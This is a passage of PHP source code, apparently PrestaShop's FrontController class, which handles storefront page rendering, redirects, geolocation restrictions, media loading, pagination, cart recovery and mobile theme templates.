ublic function initContent() { $this->process(); if (!isset($this->context->cart)) { $this->context->cart = new Cart(); } if (!$this->useMobileTheme()) { // These hooks aren't used for the mobile theme. // Needed hooks are called in the tpl files. $this->context->smarty->assign(array( 'HOOK_HEADER' => Hook::exec('displayHeader'), 'HOOK_TOP' => Hook::exec('displayTop'), 'HOOK_LEFT_COLUMN' => ($this->display_column_left ? Hook::exec('displayLeftColumn') : ''), 'HOOK_RIGHT_COLUMN' => ($this->display_column_right ? Hook::exec('displayRightColumn', array('cart' => $this->context->cart)) : ''), )); } else { $this->context->smarty->assign('HOOK_MOBILE_HEADER', Hook::exec('displayMobileHeader')); } } /** * Compiles and outputs page header section (including HTML ) * * @param bool $display If true, renders visual page header section * @deprecated */ public function displayHeader($display = true) { Tools::displayAsDeprecated(); $this->initHeader(); $hook_header = Hook::exec('displayHeader'); if ((Configuration::get('PS_CSS_THEME_CACHE') || Configuration::get('PS_JS_THEME_CACHE')) && is_writable(_PS_THEME_DIR_.'cache')) { // CSS compressor management if (Configuration::get('PS_CSS_THEME_CACHE')) { $this->css_files = Media::cccCss($this->css_files); } //JS compressor management if (Configuration::get('PS_JS_THEME_CACHE')) { $this->js_files = Media::cccJs($this->js_files); } } // Call hook before assign of css_files and js_files in order to include correctly all css and javascript files $this->context->smarty->assign(array( 'HOOK_HEADER' => $hook_header, 'HOOK_TOP' => Hook::exec('displayTop'), 'HOOK_LEFT_COLUMN' => ($this->display_column_left ? Hook::exec('displayLeftColumn') : ''), 'HOOK_RIGHT_COLUMN' => ($this->display_column_right ? Hook::exec('displayRightColumn', array('cart' => $this->context->cart)) : ''), 'HOOK_FOOTER' => Hook::exec('displayFooter') )); $this->context->smarty->assign(array( 'css_files' => $this->css_files, 'js_files' => ($this->getLayout() && (bool)Configuration::get('PS_JS_DEFER')) ? array() : $this->js_files )); $this->display_header = $display; $this->smartyOutputContent(_PS_THEME_DIR_.'header.tpl'); } /** * Compiles and outputs page footer section * * @deprecated */ public function displayFooter($display = true) { Tools::displayAsDeprecated(); $this->smartyOutputContent(_PS_THEME_DIR_.'footer.tpl'); } /** * Renders and outputs maintenance page and ends controller process. */ public function initCursedPage() { $this->displayMaintenancePage(); } /** * Called before compiling common page sections (header, footer, columns). * Good place to modify smarty variables. * * @see FrontController::initContent() */ public function process() { } /** * Redirects to redirect_after link * * @see $redirect_after */ protected function redirect() { Tools::redirectLink($this->redirect_after); } /** * Renders page content. * Used for retrocompatibility with PS 1.4 */ public function displayContent() { } /** * Compiles and outputs full page content * * @return bool * @throws Exception * @throws SmartyException */ public function display() { Tools::safePostVars(); // assign css_files and js_files at the very last time if ((Configuration::get('PS_CSS_THEME_CACHE') || Configuration::get('PS_JS_THEME_CACHE')) && is_writable(_PS_THEME_DIR_.'cache')) { // CSS compressor management if (Configuration::get('PS_CSS_THEME_CACHE')) { $this->css_files = Media::cccCss($this->css_files); } //JS compressor management if (Configuration::get('PS_JS_THEME_CACHE') && !$this->useMobileTheme()) { $this->js_files = Media::cccJs($this->js_files); } } $this->context->smarty->assign(array( 'css_files' => $this->css_files, 'js_files' => ($this->getLayout() && (bool)Configuration::get('PS_JS_DEFER')) ? array() : $this->js_files, 'js_defer' => (bool)Configuration::get('PS_JS_DEFER'), 'errors' => $this->errors, 'display_header' => $this->display_header, 'display_footer' => $this->display_footer, )); $layout = $this->getLayout(); if ($layout) { if ($this->template) { $template = $this->context->smarty->fetch($this->template); } else { // For retrocompatibility with 1.4 controller ob_start(); $this->displayContent(); $template = ob_get_contents(); ob_clean(); } $this->context->smarty->assign('template', $template); $this->smartyOutputContent($layout); } else { Tools::displayAsDeprecated('layout.tpl is missing in your theme directory'); if ($this->display_header) { $this->smartyOutputContent(_PS_THEME_DIR_.'header.tpl'); } if ($this->template) { $this->smartyOutputContent($this->template); } else { // For retrocompatibility with 1.4 controller $this->displayContent(); } if ($this->display_footer) { $this->smartyOutputContent(_PS_THEME_DIR_.'footer.tpl'); } } return true; } /** * Displays maintenance page if shop is closed. */ protected function displayMaintenancePage() { if ($this->maintenance == true || !(int)Configuration::get('PS_SHOP_ENABLE')) { $this->maintenance = true; if (!in_array(Tools::getRemoteAddr(), explode(',', Configuration::get('PS_MAINTENANCE_IP')))) { header('HTTP/1.1 503 temporarily overloaded'); $this->context->smarty->assign($this->initLogoAndFavicon()); $this->context->smarty->assign(array( 'HOOK_MAINTENANCE' => Hook::exec('displayMaintenance', array()), )); // If the controller is a module, then getTemplatePath will try to find the template in the modules, so we need to instanciate a real frontcontroller $front_controller = preg_match('/ModuleFrontController$/', get_class($this)) ? new FrontController() : $this; $this->smartyOutputContent($front_controller->getTemplatePath($this->getThemeDir().'maintenance.tpl')); exit; } } } /** * Displays 'country restricted' page if user's country is not allowed. */ protected function displayRestrictedCountryPage() { header('HTTP/1.1 503 temporarily overloaded'); $this->context->smarty->assign(array( 'shop_name' => $this->context->shop->name, 'favicon_url' => _PS_IMG_.Configuration::get('PS_FAVICON'), 'logo_url' => $this->context->link->getMediaLink(_PS_IMG_.Configuration::get('PS_LOGO')) )); $this->smartyOutputContent($this->getTemplatePath($this->getThemeDir().'restricted-country.tpl')); exit; } /** * Redirects to correct protocol if settings and request methods don't match. */ protected function sslRedirection() { // If we call a SSL controller without SSL or a non SSL controller with SSL, we redirect with the right protocol if (Configuration::get('PS_SSL_ENABLED') && $_SERVER['REQUEST_METHOD'] != 'POST' && $this->ssl != Tools::usingSecureMode()) { $this->context->cookie->disallowWriting(); header('HTTP/1.1 301 Moved Permanently'); header('Cache-Control: no-cache'); if ($this->ssl) { header('Location: '.Tools::getShopDomainSsl(true).$_SERVER['REQUEST_URI']); } else { header('Location: '.Tools::getShopDomain(true).$_SERVER['REQUEST_URI']); } exit(); } } /** * Redirects to canonical URL * * @param string $canonical_url */ protected function canonicalRedirection($canonical_url = '') { if (!$canonical_url || !Configuration::get('PS_CANONICAL_REDIRECT') || strtoupper($_SERVER['REQUEST_METHOD']) != 'GET' || Tools::getValue('live_edit')) { return; } $match_url = rawurldecode(Tools::getCurrentUrlProtocolPrefix().$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); if (!preg_match('/^'.Tools::pRegexp(rawurldecode($canonical_url), '/').'([&?].*)?$/', $match_url)) { $params = array(); $url_details = parse_url($canonical_url); if (!empty($url_details['query'])) { parse_str($url_details['query'], $query); foreach ($query as $key => $value) { $params[Tools::safeOutput($key)] = Tools::safeOutput($value); } } $excluded_key = array('isolang', 'id_lang', 'controller', 'fc', 'id_product', 'id_category', 'id_manufacturer', 'id_supplier', 'id_cms'); foreach ($_GET as $key => $value) { if (!in_array($key, $excluded_key) && Validate::isUrl($key) && Validate::isUrl($value)) { $params[Tools::safeOutput($key)] = Tools::safeOutput($value); } } $str_params = http_build_query($params, '', '&'); if (!empty($str_params)) { $final_url = preg_replace('/^([^?]*)?.*$/', '$1', $canonical_url).'?'.$str_params; } else { $final_url = preg_replace('/^([^?]*)?.*$/', '$1', $canonical_url); } // Don't send any cookie Context::getContext()->cookie->disallowWriting(); if (defined('_PS_MODE_DEV_') && _PS_MODE_DEV_ && $_SERVER['REQUEST_URI'] != __PS_BASE_URI__) { die('[Debug] This page has moved
Please use the following URL instead: '.$final_url.''); } $redirect_type = Configuration::get('PS_CANONICAL_REDIRECT') == 2 ? '301' : '302'; header('HTTP/1.0 '.$redirect_type.' Moved'); header('Cache-Control: no-cache'); Tools::redirectLink($final_url); } } /** * Geolocation management * * @param Country $default_country * @return Country|false */ protected function geolocationManagement($default_country) { if (!in_array($_SERVER['SERVER_NAME'], array('localhost', ''))) { /* Check if Maxmind Database exists */ if (@filemtime(_PS_GEOIP_DIR_._PS_GEOIP_CITY_FILE_)) { if (!isset($this->context->cookie->iso_code_country) || (isset($this->context->cookie->iso_code_country) && !in_array(strtoupper($this->context->cookie->iso_code_country), explode(';', Configuration::get('PS_ALLOWED_COUNTRIES'))))) { include_once(_PS_GEOIP_DIR_.'geoipcity.inc'); $gi = geoip_open(realpath(_PS_GEOIP_DIR_._PS_GEOIP_CITY_FILE_), GEOIP_STANDARD); $record = geoip_record_by_addr($gi, Tools::getRemoteAddr()); if (is_object($record)) { if (!in_array(strtoupper($record->country_code), explode(';', Configuration::get('PS_ALLOWED_COUNTRIES'))) && !FrontController::isInWhitelistForGeolocation()) { if (Configuration::get('PS_GEOLOCATION_BEHAVIOR') == _PS_GEOLOCATION_NO_CATALOG_) { $this->restrictedCountry = true; } elseif (Configuration::get('PS_GEOLOCATION_BEHAVIOR') == _PS_GEOLOCATION_NO_ORDER_) { $this->context->smarty->assign(array( 'restricted_country_mode' => true, 'geolocation_country' => $record->country_name )); } } else { $has_been_set = !isset($this->context->cookie->iso_code_country); $this->context->cookie->iso_code_country = strtoupper($record->country_code); } } } if (isset($this->context->cookie->iso_code_country) && $this->context->cookie->iso_code_country && !Validate::isLanguageIsoCode($this->context->cookie->iso_code_country)) { $this->context->cookie->iso_code_country = Country::getIsoById(Configuration::get('PS_COUNTRY_DEFAULT')); } if (isset($this->context->cookie->iso_code_country) && ($id_country = (int)Country::getByIso(strtoupper($this->context->cookie->iso_code_country)))) { /* Update defaultCountry */ if ($default_country->iso_code != $this->context->cookie->iso_code_country) { $default_country = new Country($id_country); } if (isset($has_been_set) && $has_been_set) { $this->context->cookie->id_currency = (int)($default_country->id_currency ? (int)$default_country->id_currency : (int)Configuration::get('PS_CURRENCY_DEFAULT')); } return $default_country; } elseif (Configuration::get('PS_GEOLOCATION_NA_BEHAVIOR') == _PS_GEOLOCATION_NO_CATALOG_ && !FrontController::isInWhitelistForGeolocation()) { $this->restrictedCountry = true; } elseif (Configuration::get('PS_GEOLOCATION_NA_BEHAVIOR') == _PS_GEOLOCATION_NO_ORDER_ && !FrontController::isInWhitelistForGeolocation()) { $this->context->smarty->assign(array( 'restricted_country_mode' => true, 'geolocation_country' => isset($record->country_name) && $record->country_name ? $record->country_name : 'Undefined' )); } } } return false; } /** * Specific medias for mobile device. * If autoload directory is present in the mobile theme, these files will not be loaded */ public function setMobileMedia() { $this->addJquery(); if (!file_exists($this->getThemeDir().'js/autoload/')) { $this->addJS(_THEME_MOBILE_JS_DIR_.'jquery.mobile-1.3.0.min.js'); $this->addJS(_THEME_MOBILE_JS_DIR_.'jqm-docs.js'); $this->addJS(_PS_JS_DIR_.'tools.js'); $this->addJS(_THEME_MOBILE_JS_DIR_.'global.js'); $this->addJqueryPlugin('fancybox'); } if (!file_exists($this->getThemeDir().'css/autoload/')) { $this->addCSS(_THEME_MOBILE_CSS_DIR_.'jquery.mobile-1.3.0.min.css', 'all'); $this->addCSS(_THEME_MOBILE_CSS_DIR_.'jqm-docs.css', 'all'); $this->addCSS(_THEME_MOBILE_CSS_DIR_.'global.css', 'all'); } } /** * Sets controller CSS and JS files. * * @return bool */ public function setMedia() { /** * If website is accessed by mobile device * @see FrontControllerCore::setMobileMedia() */ if ($this->useMobileTheme()) { $this->setMobileMedia(); return true; } $this->addCSS(_THEME_CSS_DIR_.'grid_prestashop.css', 'all'); // retro compat themes $this->addCSS(_THEME_CSS_DIR_.'global.css', 'all'); $this->addJquery(); $this->addJqueryPlugin('easing'); $this->addJS(_PS_JS_DIR_.'tools.js'); $this->addJS(_THEME_JS_DIR_.'global.js'); // Automatically add js files from js/autoload directory in the template if (@filemtime($this->getThemeDir().'js/autoload/')) { foreach (scandir($this->getThemeDir().'js/autoload/', 0) as $file) { if (preg_match('/^[^.].*\.js$/', $file)) { $this->addJS($this->getThemeDir().'js/autoload/'.$file); } } } // Automatically add css files from css/autoload directory in the template if (@filemtime($this->getThemeDir().'css/autoload/')) { foreach (scandir($this->getThemeDir().'css/autoload', 0) as $file) { if (preg_match('/^[^.].*\.css$/', $file)) { $this->addCSS($this->getThemeDir().'css/autoload/'.$file); } } } if (Tools::isSubmit('live_edit') && Tools::getValue('ad') && Tools::getAdminToken('AdminModulesPositions'.(int)Tab::getIdFromClassName('AdminModulesPositions').(int)Tools::getValue('id_employee'))) { $this->addJqueryUI('ui.sortable'); $this->addjqueryPlugin('fancybox'); $this->addJS(_PS_JS_DIR_.'hookLiveEdit.js'); } if (Configuration::get('PS_QUICK_VIEW')) { $this->addjqueryPlugin('fancybox'); } if (Configuration::get('PS_COMPARATOR_MAX_ITEM') > 0) { $this->addJS(_THEME_JS_DIR_.'products-comparison.js'); } // Execute Hook FrontController SetMedia Hook::exec('actionFrontControllerSetMedia', array()); return true; } /** * Initializes page header variables */ public function initHeader() { /** @see P3P Policies (http://www.w3.org/TR/2002/REC-P3P-20020416/#compact_policies) */ header('P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"'); header('Powered-By: PrestaShop'); // Hooks are voluntary out the initialize array (need those variables already assigned) $this->context->smarty->assign(array( 'time' => time(), 'img_update_time' => Configuration::get('PS_IMG_UPDATE_TIME'), 'static_token' => Tools::getToken(false), 'token' => Tools::getToken(), 'priceDisplayPrecision' => _PS_PRICE_DISPLAY_PRECISION_, 'content_only' => (int)Tools::getValue('content_only'), )); $this->context->smarty->assign($this->initLogoAndFavicon()); } /** * Initializes page footer variables */ public function initFooter() { $this->context->smarty->assign(array( 'HOOK_FOOTER' => Hook::exec('displayFooter'), 'conditions' => Configuration::get('PS_CONDITIONS'), 'id_cgv' => Configuration::get('PS_CONDITIONS_CMS_ID'), 'PS_SHOP_NAME' => Configuration::get('PS_SHOP_NAME'), 'PS_ALLOW_MOBILE_DEVICE' => isset($_SERVER['HTTP_USER_AGENT']) && (bool)Configuration::get('PS_ALLOW_MOBILE_DEVICE') && @filemtime(_PS_THEME_MOBILE_DIR_) )); /** * RTL support * rtl.css overrides theme css files for RTL * iso_code.css overrides default font for every language (optional) */ if ($this->context->language->is_rtl) { $this->addCSS(_THEME_CSS_DIR_.'rtl.css'); $this->addCSS(_THEME_CSS_DIR_.$this->context->language->iso_code.'.css'); } } /** * Checks if the user can use Live Edit feature * * @return bool */ public function checkLiveEditAccess() { if (!Tools::isSubmit('live_edit') || !Tools::getValue('ad') || !Tools::getValue('liveToken')) { return false; } if (Tools::getValue('liveToken') != Tools::getAdminToken('AdminModulesPositions'.(int)Tab::getIdFromClassName('AdminModulesPositions').(int)Tools::getValue('id_employee'))) { return false; } return is_dir(_PS_CORE_DIR_.DIRECTORY_SEPARATOR.Tools::getValue('ad')); } /** * Renders Live Edit widget * * @return string HTML */ public function getLiveEditFooter() { if ($this->checkLiveEditAccess()) { $data = $this->context->smarty->createData(); $data->assign(array( 'ad' => Tools::getValue('ad'), 'live_edit' => true, 'hook_list' => Hook::$executed_hooks, 'id_shop' => $this->context->shop->id )); return $this->context->smarty->createTemplate(_PS_ALL_THEMES_DIR_.'live_edit.tpl', $data)->fetch(); } else { return ''; } } /** * Assigns product list page sorting variables */ public function productSort() { // $this->orderBy = Tools::getProductsOrder('by', Tools::getValue('orderby')); // $this->orderWay = Tools::getProductsOrder('way', Tools::getValue('orderway')); // 'orderbydefault' => Tools::getProductsOrder('by'), // 'orderwayposition' => Tools::getProductsOrder('way'), // Deprecated: orderwayposition // 'orderwaydefault' => Tools::getProductsOrder('way'), $stock_management = Configuration::get('PS_STOCK_MANAGEMENT') ? true : false; // no display quantity order if stock management disabled $order_by_values = array(0 => 'name', 1 => 'price', 2 => 'date_add', 3 => 'date_upd', 4 => 'position', 5 => 'manufacturer_name', 6 => 'quantity', 7 => 'reference'); $order_way_values = array(0 => 'asc', 1 => 'desc'); $this->orderBy = Tools::strtolower(Tools::getValue('orderby', $order_by_values[(int)Configuration::get('PS_PRODUCTS_ORDER_BY')])); $this->orderWay = Tools::strtolower(Tools::getValue('orderway', $order_way_values[(int)Configuration::get('PS_PRODUCTS_ORDER_WAY')])); if (!in_array($this->orderBy, $order_by_values)) { $this->orderBy = $order_by_values[0]; } if (!in_array($this->orderWay, $order_way_values)) { $this->orderWay = $order_way_values[0]; } $this->context->smarty->assign(array( 'orderby' => $this->orderBy, 'orderway' => $this->orderWay, 'orderbydefault' => $order_by_values[(int)Configuration::get('PS_PRODUCTS_ORDER_BY')], 'orderwayposition' => $order_way_values[(int)Configuration::get('PS_PRODUCTS_ORDER_WAY')], // Deprecated: orderwayposition 'orderwaydefault' => $order_way_values[(int)Configuration::get('PS_PRODUCTS_ORDER_WAY')], 'stock_management' => (int)$stock_management )); } /** * Assigns product list page pagination variables * * @param int|null $total_products * @throws PrestaShopException */ public function pagination($total_products = null) { if (!self::$initialized) { $this->init(); } elseif (!$this->context) { $this->context = Context::getContext(); } // Retrieve the default number of products per page and the other available selections $default_products_per_page = max(1, (int)Configuration::get('PS_PRODUCTS_PER_PAGE')); $n_array = array($default_products_per_page, $default_products_per_page * 2, $default_products_per_page * 5); if ((int)Tools::getValue('n') && (int)$total_products > 0) { $n_array[] = $total_products; } // Retrieve the current number of products per page (either the default, the GET parameter or the one in the cookie) $this->n = $default_products_per_page; if (isset($this->context->cookie->nb_item_per_page) && in_array($this->context->cookie->nb_item_per_page, $n_array)) { $this->n = (int)$this->context->cookie->nb_item_per_page; } if ((int)Tools::getValue('n') && in_array((int)Tools::getValue('n'), $n_array)) { $this->n = (int)Tools::getValue('n'); } // Retrieve the page number (either the GET parameter or the first page) $this->p = (int)Tools::getValue('p', 1); // If the parameter is not correct then redirect (do not merge with the previous line, the redirect is required in order to avoid duplicate content) if (!is_numeric($this->p) || $this->p < 1) { Tools::redirect($this->context->link->getPaginationLink(false, false, $this->n, false, 1, false)); } // Remove the page parameter in order to get a clean URL for the pagination template $current_url = preg_replace('/(?:(\?)|&)p=\d+/', '$1', Tools::htmlentitiesUTF8($_SERVER['REQUEST_URI'])); if ($this->n != $default_products_per_page || isset($this->context->cookie->nb_item_per_page)) { $this->context->cookie->nb_item_per_page = $this->n; } $pages_nb = ceil($total_products / (int)$this->n); if ($this->p > $pages_nb && $total_products != 0) { Tools::redirect($this->context->link->getPaginationLink(false, false, $this->n, false, $pages_nb, false)); } $range = 2; /* how many pages around page selected */ $start = (int)($this->p - $range); if ($start < 1) { $start = 1; } $stop = (int)($this->p + $range); if ($stop > $pages_nb) { $stop = (int)$pages_nb; } $this->context->smarty->assign(array( 'nb_products' => $total_products, 'products_per_page' => $this->n, 'pages_nb' => $pages_nb, 'p' => $this->p, 'n' => $this->n, 'nArray' => $n_array, 'range' => $range, 'start' => $start, 'stop' => $stop, 'current_url' => $current_url, )); } /** * Sets and returns customer groups that the current customer(visitor) belongs to. * * @return array * @throws PrestaShopDatabaseException */ public static function getCurrentCustomerGroups() { if (!Group::isFeatureActive()) { return array(); } $context = Context::getContext(); if (!isset($context->customer) || !$context->customer->id) { return array(); } if (!is_array(self::$currentCustomerGroups)) { self::$currentCustomerGroups = array(); $result = Db::getInstance()->executeS('SELECT id_group FROM '._DB_PREFIX_.'customer_group WHERE id_customer = '.(int)$context->customer->id); foreach ($result as $row) { self::$currentCustomerGroups[] = $row['id_group']; } } return self::$currentCustomerGroups; } /** * Checks if user's location is whitelisted. * * @staticvar bool|null $allowed * @return bool */ protected static function isInWhitelistForGeolocation() { static $allowed = null; if ($allowed !== null) { return $allowed; } $allowed = false; $user_ip = Tools::getRemoteAddr(); $ips = array(); // retrocompatibility $ips_old = explode(';', Configuration::get('PS_GEOLOCATION_WHITELIST')); if (is_array($ips_old) && count($ips_old)) { foreach ($ips_old as $ip) { $ips = array_merge($ips, explode("\n", $ip)); } } $ips = array_map('trim', $ips); if (is_array($ips) && count($ips)) { foreach ($ips as $ip) { if (!empty($ip) && preg_match('/^'.$ip.'.*/', $user_ip)) { $allowed = true; } } } return $allowed; } /** * Checks if token is valid * * @since * @return bool */ public function isTokenValid() { if (!Configuration::get('PS_TOKEN_ENABLE')) { return true; } return (strcasecmp(Tools::getToken(false), Tools::getValue('token')) == 0); } /** * Adds a media file(s) (CSS, JS) to page header * * @param string|array $media_uri Path to file, or an array of paths like: array(array(uri => media_type), ...) * @param string|null $css_media_type CSS media type * @param int|null $offset * @param bool $remove If True, removes media files * @param bool $check_path If true, checks if files exists * @return true|void */ public function addMedia($media_uri, $css_media_type = null, $offset = null, $remove = false, $check_path = true) { if (!is_array($media_uri)) { if ($css_media_type) { $media_uri = array($media_uri => $css_media_type); } else { $media_uri = array($media_uri); } } $list_uri = array(); foreach ($media_uri as $file => $media) { if (!Validate::isAbsoluteUrl($media)) { $different = 0; $different_css = 0; $type = 'css'; if (!$css_media_type) { $type = 'js'; $file = $media; } if (strpos($file, __PS_BASE_URI__.'modules/') === 0) { $override_path = str_replace(__PS_BASE_URI__.'modules/', _PS_ROOT_DIR_.'/themes/'._THEME_NAME_.'/'.$type.'/modules/', $file, $different); if (strrpos($override_path, $type.'/'.basename($file)) !== false) { $override_path_css = str_replace($type.'/'.basename($file), basename($file), $override_path, $different_css); } if ($different && @filemtime($override_path)) { $file = str_replace(__PS_BASE_URI__.'modules/', __PS_BASE_URI__.'themes/'._THEME_NAME_.'/'.$type.'/modules/', $file, $different); } elseif ($different_css && @filemtime($override_path_css)) { $file = $override_path_css; } if ($css_media_type) { $list_uri[$file] = $media; } else { $list_uri[] = $file; } } else { $list_uri[$file] = $media; } } else { $list_uri[$file] = $media; } } if ($remove) { if ($css_media_type) { return parent::removeCSS($list_uri, $css_media_type); } return parent::removeJS($list_uri); } if ($css_media_type) { return parent::addCSS($list_uri, $css_media_type, $offset, $check_path); } return parent::addJS($list_uri, $check_path); } /** * Removes media file(s) from page header * * @param string|array $media_uri Path to file, or an array paths of like: array(array(uri => media_type), ...) * @param string|null $css_media_type CSS media type * @param bool $check_path If true, checks if files exists */ public function removeMedia($media_uri, $css_media_type = null, $check_path = true) { FrontController::addMedia($media_uri, $css_media_type, null, true, $check_path); } /** * Add one or several CSS for front, checking if css files are overridden in theme/css/modules/ directory * @see Controller::addCSS() * * @param array|string $css_uri $media_uri Path to file, or an array of paths like: array(array(uri => media_type), ...) * @param string $css_media_type CSS media type * @param int|null $offset * @param bool $check_path If true, checks if files exists * @return true|void */ public function addCSS($css_uri, $css_media_type = 'all', $offset = null, $check_path = true) { return FrontController::addMedia($css_uri, $css_media_type, $offset = null, false, $check_path); } /** * Removes CSS file(s) from page header * * @param array|string $css_uri $media_uri Path to file, or an array of paths like: array(array(uri => media_type), ...) * @param string $css_media_type CSS media type * @param bool $check_path If true, checks if files exists */ public function removeCSS($css_uri, $css_media_type = 'all', $check_path = true) { return FrontController::removeMedia($css_uri, $css_media_type, $check_path); } /** * Add one or several JS files for front, checking if js files are overridden in theme/js/modules/ directory * @see Controller::addJS() * * @param array|string $js_uri Path to file, or an array of paths * @param bool $check_path If true, checks if files exists * @return true|void */ public function addJS($js_uri, $check_path = true) { return Frontcontroller::addMedia($js_uri, null, null, false, $check_path); } /** * Removes JS file(s) from page header * * @param array|string $js_uri Path to file, or an array of paths * @param bool $check_path If true, checks if files exists */ public function removeJS($js_uri, $check_path = true) { return FrontController::removeMedia($js_uri, null, $check_path); } /** * Recovers cart information * * @return int|false */ protected function recoverCart() { if (($id_cart = (int)Tools::getValue('recover_cart')) && Tools::getValue('token_cart') == md5(_COOKIE_KEY_.'recover_cart_'.$id_cart)) { $cart = new Cart((int)$id_cart); if (Validate::isLoadedObject($cart)) { $customer = new Customer((int)$cart->id_customer); if (Validate::isLoadedObject($customer)) { $customer->logged = 1; $this->context->customer = $customer; $this->context->cookie->id_customer = (int)$customer->id; $this->context->cookie->customer_lastname = $customer->lastname; $this->context->cookie->customer_firstname = $customer->firstname; $this->context->cookie->logged = 1; $this->context->cookie->check_cgv = 1; $this->context->cookie->is_guest = $customer->isGuest(); $this->context->cookie->passwd = $customer->passwd; $this->context->cookie->email = $customer->email; return $id_cart; } } } else { return false; } } /** * Sets template file for page content output * * @param string $default_template */ public function setTemplate($default_template) { if ($this->useMobileTheme()) { $this->setMobileTemplate($default_template); } else { $template = $this->getOverrideTemplate(); if ($template) { parent::setTemplate($template); } else { parent::setTemplate($default_template); } } } /** * Returns an overridden template path (if any) for this controller. * If not overridden, will return false. This method can be easily overriden in a * specific controller. * * @since * @return string|bool */ public function getOverrideTemplate() { return Hook::exec('DisplayOverrideTemplate', array('controller' => $this)); } /** * Checks if mobile theme is active and in use. * * @staticvar bool|null $use_mobile_template * @return bool */ protected function useMobileTheme() { static $use_mobile_template = null; // The mobile theme must have a layout to be used if ($use_mobile_template === null) { $use_mobile_template = ($this->context->getMobileDevice() && file_exists(_PS_THEME_MOBILE_DIR_.'layout.tpl')); } return $use_mobile_template; } /** * Returns theme directory (regular or mobile) * * @return string */ protected function getThemeDir() { return $this->useMobileTheme() ? _PS_THEME_MOBILE_DIR_ : _PS_THEME_DIR_; } /** * Returns theme override directory (regular or mobile) * * @return string */ protected function getOverrideThemeDir() { return $this->useMobileTheme() ? _PS_THEME_MOBILE_OVERRIDE_DIR_ : _PS_THEME_OVERRIDE_DIR_; } /** * Returns the layout corresponding to the current page by using the override system * Ex: * On the url: http://localhost/index.php?id_product=1&controller=product, this method will * check if the layout exists in the following files (in that order), and return the first found: * - /themes/default/override/layout-product-1.tpl * - /themes/default/override/layout-product.tpl * - /themes/default/layout.tpl * * @since * @return bool|string */ public function getLayout() { $entity = $this->php_self; $id_item = (int)Tools::getValue('id_'.$entity); $layout_dir = $this->getThemeDir(); $layout_override_dir = $this->getOverrideThemeDir(); $layout = false; if ($entity) { if ($id_item > 0 && file_exists($layout_override_dir.'layout-'.$entity.'-'.$id_item.'.tpl')) { $layout = $layout_override_dir.'layout-'.$entity.'-'.$id_item.'.tpl'; } elseif (file_exists($layout_override_dir.'layout-'.$entity.'.tpl')) { $layout = $layout_override_dir.'layout-'.$entity.'.tpl'; } } if (!$layout && file_exists($layout_dir.'layout.tpl')) { $layout = $layout_dir.'layout.tpl'; } return $layout; } /** * Returns template path * * @param string $template * @return string */ public function getTemplatePath($template) { if (!$this->useMobileTheme()) { return $template; } $tpl_file = basename($template); $dirname = dirname($template).(substr(dirname($template), -1, 1) == '/' ? '' : '/'); if ($dirname == _PS_THEME_DIR_) { if (file_exists(_PS_THEME_MOBILE_DIR_.$tpl_file)) { $template = _PS_THEME_MOBILE_DIR_.$tpl_file; } } elseif ($dirname == _PS_THEME_MOBILE_DIR_) { if (!file_exists(_PS_THEME_MOBILE_DIR_.$tpl_file) && file_exists(_PS_THEME_DIR_.$tpl_file)) { $template = _PS_THEME_DIR_.$tpl_file; } } return $template; } /** * Checks if the template set is available for mobile themes, * otherwise front template is chosen. * * @param string $template */ public function setMobileTemplate($template) { // Needed for site map $blockmanufacturer = Module::getInstanceByName('blockmanufacturer'); $blocksupplier = Module::getInstanceByName('blocksupplier'); $this->context->smarty->assign(array( 'categoriesTree' => Category::getRootCategory()->recurseLiteCategTree(0), 'categoriescmsTree' => CMSCategory::getRecurseCategory($this->context->language->id, 1, 1, 1), 'voucherAllowed' => (int)CartRule::isFeatureActive(), 'display_manufacturer_link' => (bool)$blockmanufacturer->active, 'display_supplier_link' => (bool)$blocksupplier->active, 'PS_DISPLAY_SUPPLIERS' => Configuration::get('PS_DISPLAY_SUPPLIERS'), 'PS_DISPLAY_BEST_SELLERS' => Configuration::get('PS_DISPLAY_BEST_SELLERS'), 'display_store' => Configuration::get('PS_STORES_DISPLAY_SITEMAP'), 'conditions' => Configuration::get('PS_CONDITIONS'), 'id_cgv' => Configuration::get('PS_CONDITIONS_CMS_ID'), 'PS_SHOP_NAME' => Configuration::get('PS_SHOP_NAME'), )); $template = $this->getTemplatePath($template); $assign = array(); $assign['tpl_file'] = basename($template, '.tpl'); if (isset($this->php_self)) { $assign['controller_name'] = $this->php_self; } $this->context->smarty->assign($assign); $this->template = $template; } /** * Returns logo and favicon variables, depending * on active theme type (regular or mobile) * * @since * @return array */ public function initLogoAndFavicon() { $mobile_device = $this->context->getMobileDevice(); if ($mobile_device && Configuration::get('PS_LOGO_MOBILE')) { $logo = $this->context->link->getMediaLink(_PS_IMG_.Configuration::get('PS_LOGO_MOBILE').'?'.Configuration::get('PS_IMG_UPDATE_TIME')); } else { $logo = $this->context->link->getMediaLink(_PS_IMG_.Configuration::get('PS_LOGO')); } return array( 'favicon_url' => _PS_IMG_.Configuration::get('PS_FAVICON'), 'logo_image_width' => ($mobile_device == false ? Configuration::get('SHOP_LOGO_WIDTH') : Configuration::get('SHOP_LOGO_MOBILE_WIDTH')), 'logo_image_height' => ($mobile_device == false ? Configuration::get('SHOP_LOGO_HEIGHT') : Configuration::get('SHOP_LOGO_MOBILE_HEIGHT')), 'logo_url' => $logo ); } /** * Renders and adds color list HTML for each product in a list * * @param array $products */ public function addColorsToProductList(&$products) { if (!is_array($products) || !count($products) || !file_exists(_PS_THEME_DIR_.'product-list-colors.tpl')) { return; } $products_need_cache = array(); foreach ($products as &$product) { if (!$this->isCached(_PS_THEME_DIR_.'product-list-colors.tpl', $this->getColorsListCacheId($product['id_product']))) { $products_need_cache[] = (int)$product['id_product']; } } unset($product); $colors = false; if (count($products_need_cache)) { $colors = Product::getAttributesColorList($products_need_cache); } Tools::enableCache(); foreach ($products as &$product) { $tpl = $this->context->smarty->createTemplate(_PS_THEME_DIR_.'product-list-colors.tpl', $this->getColorsListCacheId($product['id_product'])); if (isset($colors[$product['id_product']])) { $tpl->assign(array( 'id_product' => $product['id_product'], 'colors_list' => $colors[$product['id_product']], 'link' => Context::getContext()->link, 'img_col_dir' => _THEME_COL_DIR_, 'col_img_dir' => _PS_COL_IMG_DIR_ )); } if (!in_array($product['id_product'], $products_need_cache) || isset($colors[$product['id_product']])) { $product['color_list'] = $tpl->fetch(_PS_THEME_DIR_.'product-list-colors.tpl', $this->getColorsListCacheId($product['id_product'])); } else { $product['color_list'] = ''; } } Tools::restoreCacheSettings(); } /** * Returns cache ID for product color list * * @param int $id_product * @return string */ protected function getColorsListCacheId($id_product) 